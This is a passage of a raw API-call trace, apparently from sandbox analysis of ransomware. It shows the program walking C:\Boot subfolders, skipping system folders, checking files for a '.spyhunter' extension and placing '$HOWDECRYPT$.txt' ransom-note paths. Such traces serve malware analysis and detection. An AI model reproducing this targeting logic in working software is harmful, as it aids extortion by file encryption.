lstrlenW (lpString="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui") returned 33 [0080.329] GetProcessHeap () returned 0x2c0000 [0080.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30cbc8 [0080.329] GetProcessHeap () returned 0x2c0000 [0080.329] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30cb48, Size=0x80) returned 0x30cc58 [0080.329] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.329] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0080.329] lstrlenW (lpString="Windows") returned 7 [0080.329] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.329] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.329] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0080.329] lstrlenW (lpString="System Volume Information") returned 25 [0080.329] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui") returned 33 [0080.329] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.329] lstrcmpW (lpString1="memtest.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.329] lstrcmpW (lpString1="memtest.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.329] lstrlenW (lpString="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui") returned 33 [0080.329] GetProcessHeap () returned 0x2c0000 [0080.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30cce0 [0080.329] GetProcessHeap () returned 0x2c0000 [0080.329] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30cc58, Size=0x88) returned 0x30cd70 [0080.329] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.329] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.329] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\$HOWDECRYPT$.txt") returned 34 [0080.329] lstrlenW (lpString="\\\\?\\C:\\Boot\\en-US\\$HOWDECRYPT$.txt") returned 34 [0080.329] GetProcessHeap () returned 0x2c0000 [0080.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30ce00 [0080.329] GetProcessHeap () returned 0x2c0000 [0080.330] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30cd70, Size=0x90) returned 0x30ce90 [0080.330] GetProcessHeap () returned 0x2c0000 [0080.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.330] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.330] lstrcmpiW (lpString1="es-ES", lpString2="Windows") returned -1 [0080.330] lstrlenW (lpString="Windows") returned 7 [0080.330] lstrcmpiW (lpString1="es-ES", lpString2="$Recycle.bin") returned 1 [0080.330] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.330] lstrcmpiW (lpString1="es-ES", lpString2="System Volume Information") returned -1 [0080.330] lstrlenW (lpString="System Volume Information") returned 25 [0080.330] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES") returned 17 [0080.330] lstrcmpW (lpString1="es-ES", lpString2=".") returned 1 [0080.330] lstrcmpW (lpString1="es-ES", lpString2="..") returned 1 [0080.330] GetProcessHeap () returned 0x2c0000 [0080.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.330] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\*") returned 19 [0080.330] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.331] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.331] lstrlenW (lpString="Windows") returned 7 [0080.331] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.331] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.331] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.331] lstrlenW (lpString="System Volume Information") returned 25 [0080.331] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\.") returned 19 [0080.331] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.331] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.331] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.331] lstrlenW (lpString="Windows") returned 7 [0080.331] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.331] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.331] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.331] lstrlenW (lpString="System Volume Information") returned 25 [0080.331] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\..") returned 20 [0080.331] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.331] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.331] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.331] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.331] lstrlenW (lpString="Windows") returned 7 [0080.331] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.331] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.331] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.331] lstrlenW (lpString="System Volume Information") returned 25 [0080.331] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 33 [0080.331] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.331] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.331] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.331] lstrlenW (lpString="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 33 [0080.331] GetProcessHeap () returned 0x2c0000 [0080.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30cd70 [0080.332] GetProcessHeap () returned 0x2c0000 [0080.332] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30ce90, Size=0x98) returned 0x30ce90 [0080.332] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.332] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.332] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\$HOWDECRYPT$.txt") returned 34 [0080.332] lstrlenW (lpString="\\\\?\\C:\\Boot\\es-ES\\$HOWDECRYPT$.txt") returned 34 [0080.332] GetProcessHeap () returned 0x2c0000 [0080.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30cf30 [0080.332] GetProcessHeap () returned 0x2c0000 [0080.332] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30ce90, Size=0xa0) returned 0x30b210 [0080.332] GetProcessHeap () returned 0x2c0000 [0080.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.332] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.332] lstrcmpiW (lpString1="fi-FI", lpString2="Windows") returned -1 [0080.332] lstrlenW (lpString="Windows") returned 7 [0080.332] lstrcmpiW (lpString1="fi-FI", lpString2="$Recycle.bin") returned 1 [0080.332] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.332] lstrcmpiW (lpString1="fi-FI", lpString2="System Volume Information") returned -1 [0080.332] lstrlenW (lpString="System Volume Information") returned 25 [0080.332] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI") returned 17 [0080.332] lstrcmpW (lpString1="fi-FI", lpString2=".") returned 1 [0080.332] lstrcmpW (lpString1="fi-FI", lpString2="..") returned 1 [0080.332] GetProcessHeap () returned 0x2c0000 [0080.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.332] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\*") returned 19 [0080.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.332] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.332] lstrlenW (lpString="Windows") returned 7 [0080.333] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.333] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.333] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.333] lstrlenW (lpString="System Volume Information") returned 25 [0080.333] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\.") returned 19 [0080.333] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.333] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.333] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.333] lstrlenW (lpString="Windows") returned 7 [0080.333] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.333] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.333] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.333] lstrlenW (lpString="System Volume Information") returned 25 [0080.333] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\..") returned 20 [0080.333] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.333] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.333] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.333] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.333] lstrlenW (lpString="Windows") returned 7 [0080.333] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.333] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.333] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.333] lstrlenW (lpString="System Volume Information") returned 25 [0080.333] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 33 [0080.333] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.333] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.333] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.333] lstrlenW (lpString="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 33 [0080.333] GetProcessHeap () returned 0x2c0000 [0080.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 0x30ce90 [0080.333] GetProcessHeap () returned 0x2c0000 [0080.333] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b210, Size=0xa8) returned 0x30b210 [0080.333] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.333] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.334] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\$HOWDECRYPT$.txt") returned 34 [0080.334] lstrlenW (lpString="\\\\?\\C:\\Boot\\fi-FI\\$HOWDECRYPT$.txt") returned 34 [0080.334] GetProcessHeap () returned 0x2c0000 [0080.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30b2c0 [0080.334] GetProcessHeap () returned 0x2c0000 [0080.334] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b210, Size=0xb0) returned 0x30b350 [0080.334] GetProcessHeap () returned 0x2c0000 [0080.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.334] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.334] lstrcmpiW (lpString1="Fonts", lpString2="Windows") returned -1 [0080.334] lstrlenW (lpString="Windows") returned 7 [0080.334] lstrcmpiW (lpString1="Fonts", lpString2="$Recycle.bin") returned 1 [0080.334] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.334] lstrcmpiW (lpString1="Fonts", lpString2="System Volume Information") returned -1 [0080.334] lstrlenW (lpString="System Volume Information") returned 25 [0080.334] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts") returned 17 [0080.334] lstrcmpW (lpString1="Fonts", lpString2=".") returned 1 [0080.334] lstrcmpW (lpString1="Fonts", lpString2="..") returned 1 [0080.334] GetProcessHeap () returned 0x2c0000 [0080.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.334] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\*") returned 19 [0080.334] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.335] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.335] lstrlenW (lpString="Windows") returned 7 [0080.335] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.335] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.335] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.335] lstrlenW (lpString="System Volume Information") returned 25 [0080.335] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\.") returned 19 [0080.335] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.335] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.335] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.335] lstrlenW (lpString="Windows") returned 7 [0080.335] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.335] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.335] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.335] lstrlenW (lpString="System Volume Information") returned 25 [0080.335] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\..") returned 20 [0080.335] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.335] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.335] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.335] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="Windows") returned -1 [0080.335] lstrlenW (lpString="Windows") returned 7 [0080.335] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="$Recycle.bin") returned 1 [0080.335] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.335] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="System Volume Information") returned -1 [0080.335] lstrlenW (lpString="System Volume Information") returned 25 [0080.335] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf") returned 30 [0080.335] StrStrIW (lpFirst="chs_boot.ttf", lpSrch=".spyhunter") returned 0x0 [0080.335] lstrcmpW (lpString1="chs_boot.ttf", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.335] lstrcmpW (lpString1="chs_boot.ttf", lpString2="_uninstalling_.png") returned 1 [0080.335] lstrlenW (lpString="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf") returned 30 [0080.335] GetProcessHeap () returned 0x2c0000 [0080.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x7e) returned 0x30cc58 [0080.336] GetProcessHeap () returned 0x2c0000 [0080.336] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b350, Size=0xb8) returned 0x30b350 [0080.336] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.336] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="Windows") returned -1 [0080.336] lstrlenW (lpString="Windows") returned 7 [0080.336] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="$Recycle.bin") returned 1 [0080.336] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.336] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="System Volume Information") returned -1 [0080.336] lstrlenW (lpString="System Volume Information") returned 25 [0080.336] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf") returned 30 [0080.336] StrStrIW (lpFirst="cht_boot.ttf", lpSrch=".spyhunter") returned 0x0 [0080.336] lstrcmpW (lpString1="cht_boot.ttf", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.336] lstrcmpW (lpString1="cht_boot.ttf", lpString2="_uninstalling_.png") returned 1 [0080.336] lstrlenW (lpString="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf") returned 30 [0080.336] GetProcessHeap () returned 0x2c0000 [0080.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x7e) returned 0x30b210 [0080.336] GetProcessHeap () returned 0x2c0000 [0080.336] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b350, Size=0xc0) returned 0x30b350 [0080.336] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.336] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="Windows") returned -1 [0080.336] lstrlenW (lpString="Windows") returned 7 [0080.336] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="$Recycle.bin") returned 1 [0080.336] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.336] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="System Volume Information") returned -1 [0080.336] lstrlenW (lpString="System Volume Information") returned 25 [0080.336] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf") returned 30 [0080.336] StrStrIW (lpFirst="jpn_boot.ttf", lpSrch=".spyhunter") returned 0x0 [0080.336] lstrcmpW (lpString1="jpn_boot.ttf", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.336] lstrcmpW (lpString1="jpn_boot.ttf", lpString2="_uninstalling_.png") returned 1 [0080.336] lstrlenW (lpString="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf") returned 30 [0080.336] GetProcessHeap () returned 0x2c0000 [0080.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x7e) returned 0x30b418 [0080.336] GetProcessHeap () returned 0x2c0000 [0080.336] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b350, Size=0xc8) returned 0x30b4a0 [0080.336] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.336] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="Windows") returned -1 [0080.336] lstrlenW (lpString="Windows") returned 7 [0080.336] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="$Recycle.bin") returned 1 [0080.337] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.337] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="System Volume Information") returned -1 [0080.337] lstrlenW (lpString="System Volume Information") returned 25 [0080.337] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf") returned 30 [0080.337] StrStrIW (lpFirst="kor_boot.ttf", lpSrch=".spyhunter") returned 0x0 [0080.337] lstrcmpW (lpString1="kor_boot.ttf", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.337] lstrcmpW (lpString1="kor_boot.ttf", lpString2="_uninstalling_.png") returned 1 [0080.337] lstrlenW (lpString="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf") returned 30 [0080.337] GetProcessHeap () returned 0x2c0000 [0080.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x7e) returned 0x30b350 [0080.337] GetProcessHeap () returned 0x2c0000 [0080.337] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b4a0, Size=0xd0) returned 0x30b4a0 [0080.337] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.337] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="Windows") returned -1 [0080.337] lstrlenW (lpString="Windows") returned 7 [0080.337] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="$Recycle.bin") returned 1 [0080.337] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.337] lstrcmpiW (lpString1="wgl4_boot.ttf", lpString2="System Volume Information") returned 1 [0080.337] lstrlenW (lpString="System Volume Information") returned 25 [0080.337] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 31 [0080.337] StrStrIW (lpFirst="wgl4_boot.ttf", lpSrch=".spyhunter") returned 0x0 [0080.337] lstrcmpW (lpString1="wgl4_boot.ttf", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.337] lstrcmpW (lpString1="wgl4_boot.ttf", lpString2="_uninstalling_.png") returned 1 [0080.337] lstrlenW (lpString="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 31 [0080.337] GetProcessHeap () returned 0x2c0000 [0080.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x80) returned 0x30b578 [0080.337] GetProcessHeap () returned 0x2c0000 [0080.337] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b4a0, Size=0xd8) returned 0x30b600 [0080.337] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0 [0080.337] FindClose (in: hFindFile=0x30c378 | out: hFindFile=0x30c378) returned 1 [0080.337] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\$HOWDECRYPT$.txt") returned 34 [0080.337] lstrlenW (lpString="\\\\?\\C:\\Boot\\Fonts\\$HOWDECRYPT$.txt") returned 34 [0080.337] GetProcessHeap () returned 0x2c0000 [0080.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x86) returned 0x30b4a0 [0080.338] GetProcessHeap () returned 0x2c0000 [0080.338] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x30b600, Size=0xe0) returned 0x30b600 [0080.338] GetProcessHeap () returned 0x2c0000 [0080.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0080.338] FindNextFileW (in: hFindFile=0x2d84e8, lpFindFileData=0x298f9e8 | out: lpFindFileData=0x298f9e8) returned 1 [0080.338] lstrcmpiW (lpString1="fr-FR", lpString2="Windows") returned -1 [0080.338] lstrlenW (lpString="Windows") returned 7 [0080.338] lstrcmpiW (lpString1="fr-FR", lpString2="$Recycle.bin") returned 1 [0080.338] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.338] lstrcmpiW (lpString1="fr-FR", lpString2="System Volume Information") returned -1 [0080.338] lstrlenW (lpString="System Volume Information") returned 25 [0080.338] wnsprintfW (in: pszDest=0x2e9e90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR") returned 17 [0080.338] lstrcmpW (lpString1="fr-FR", lpString2=".") returned 1 [0080.338] lstrcmpW (lpString1="fr-FR", lpString2="..") returned 1 [0080.338] GetProcessHeap () returned 0x2c0000 [0080.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0080.338] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\*") returned 19 [0080.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 0x30c378 [0080.339] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.339] lstrlenW (lpString="Windows") returned 7 [0080.339] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.339] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.339] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.339] lstrlenW (lpString="System Volume Information") returned 25 [0080.339] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\.") returned 19 [0080.339] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.339] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.339] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.339] lstrlenW (lpString="Windows") returned 7 [0080.339] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.339] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.339] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.339] lstrlenW (lpString="System Volume Information") returned 25 [0080.339] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\..") returned 20 [0080.339] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.339] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.339] FindNextFileW (in: hFindFile=0x30c378, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0080.339] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0080.339] lstrlenW (lpString="Windows") returned 7 [0080.339] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0080.339] lstrlenW (lpString="$Recycle.bin") returned 12 [0080.339] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0080.339] lstrlenW (lpString="System Volume Information") returned 25 [0080.339] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 33 [0080.339] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".spyhunter") returned 0x0 [0080.339] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0080.339] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="_uninstalling_.png") returned 1 [0080.339] lstrlenW (lpString="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 33 [0080.339] GetProcessHeap () returned 0x2c0000 [0080.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x84) returned 